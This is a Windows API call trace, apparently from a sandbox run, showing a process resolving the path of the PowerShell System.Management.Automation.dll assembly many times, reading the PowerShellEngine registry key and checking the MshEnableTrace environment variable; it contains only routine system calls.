[0081.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.230] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6f8 | out: phkResult=0x16d6f8*=0x308) returned 0x0
[0081.231] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d67c, lpData=0x0, lpcbData=0x16d678*=0x0 | out: lpType=0x16d67c*=0x1, lpData=0x0, lpcbData=0x16d678*=0x56) returned 0x0
[0081.231] CoTaskMemAlloc (cb=0x5a) returned 0x1b7f5cd0
[0081.231] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d64c, lpData=0x1b7f5cd0, lpcbData=0x16d648*=0x56 | out: lpType=0x16d64c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d648*=0x56) returned 0x0
[0081.231] CoTaskMemFree (pv=0x1b7f5cd0)
[0081.231] RegCloseKey (hKey=0x308) returned 0x0
[0081.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.260] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.260] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.260] CoTaskMemFree (pv=0x256340)
[0081.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
